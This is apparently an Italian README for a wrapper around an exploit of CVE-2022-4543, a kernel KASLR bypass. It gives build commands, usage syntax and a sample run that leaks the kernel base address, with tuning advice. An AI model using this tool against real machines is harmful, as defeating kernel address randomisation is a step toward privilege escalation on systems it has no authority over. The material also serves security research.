
Questo è un wrapper dell'exploit CVE-2022-4543 di willsroot per aiutarti a determinare e ottenere l'indirizzo di base del kernel.
In base alle tue esigenze (Opzionale):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
Per alcuni sistemi operativi, installa prima la libc statica.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
Dopo aver eseguito entrambi i programmi, otterrai l'indirizzo più frequente in base al tuo offset.
In pratica, l'indirizzo di base reale del kernel apparirà in più di 1/4 dei tentativi totali. Si consigliano più di 100 tentativi.